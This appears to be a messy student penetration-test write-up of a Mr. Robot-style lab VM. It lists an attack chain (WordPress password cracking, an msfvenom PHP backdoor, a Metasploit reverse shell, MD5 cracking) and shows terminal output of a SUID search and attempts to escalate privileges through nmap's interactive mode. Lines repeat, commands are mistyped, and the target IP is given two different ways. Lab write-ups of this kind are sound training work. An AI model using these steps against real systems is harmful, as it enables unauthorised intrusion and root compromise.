Report On VM 2 Ip:-144.244.143.144 Name:sathya Sachi Paira: Nmap - P - A 143.244.143.144
Report On VM 2 Ip:-144.244.143.144 Name:sathya Sachi Paira: Nmap - P - A 143.244.143.144
Report On VM 2 Ip:-144.244.143.144 Name:sathya Sachi Paira: Nmap - P - A 143.244.143.144
Ip:-144.244.143.144
name:sathya sachi paira
email:[email protected]
Penetrating Methodology:
•Recon (Nikto)
•Use robot.txt
•Grab 1st key
•Download fsocity.dic file and use a dictionary
•WordPress password cracking (wpscan)
•Login into WordPress
•Generate PHP Backdoor (Msfvenom)
•Upload and execute a backdoor
•Reverse connection (Metasploit)
•Get MD5 hash and decrypt it
•Import python one-liner for proper TTY shell
•Find / perm u=s for Privilege Escalation
•Get Root access and capture the flag.
Using waplazzer
and we see cms type is running is wordpress
Once you have logged in, make the malicious file that you got to upload in it. Generate code
through the msfvenom command:
ls
ls
key-2-of-3.txt password.raw-md5
cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
nmap -interactive
nmap -interactive
Failed to open input file nteractive for reading
QUITTING!
find / -perm +6000 2>/dev/null | grep '/bin/'
find / -perm +6000 2>/dev/null | grep '/bin/'
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/mail-touchlock
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/screen
/usr/bin/mail-unlock
/usr/bin/mail-lock
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/chfn
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/expiry
/usr/bin/dotlockfile
/usr/bin/sudo
/usr/bin/ssh-agent
/usr/bin/wall
/usr/local/bin/nmap
^[[200~/usr/local/bin/nmap
0~/usr/local/bin/nmap
bash: 0~/usr/local/bin/nmap: No such file or directory
/usr/local/bin/nmapn -interactive
/usr/local/bin/nmapn -interactive
bash: /usr/local/bin/nmapn: No such file or directory
robot@linux:~$
/usr/local/bin/nmapn --interactive
/usr/local/bin/nmapn --interactive
bash: /usr/local/bin/nmapn: No such file or directory
robot@linux:~$
/usr/local/bin/nmap --interactive
/usr/local/bin/nmap --interactive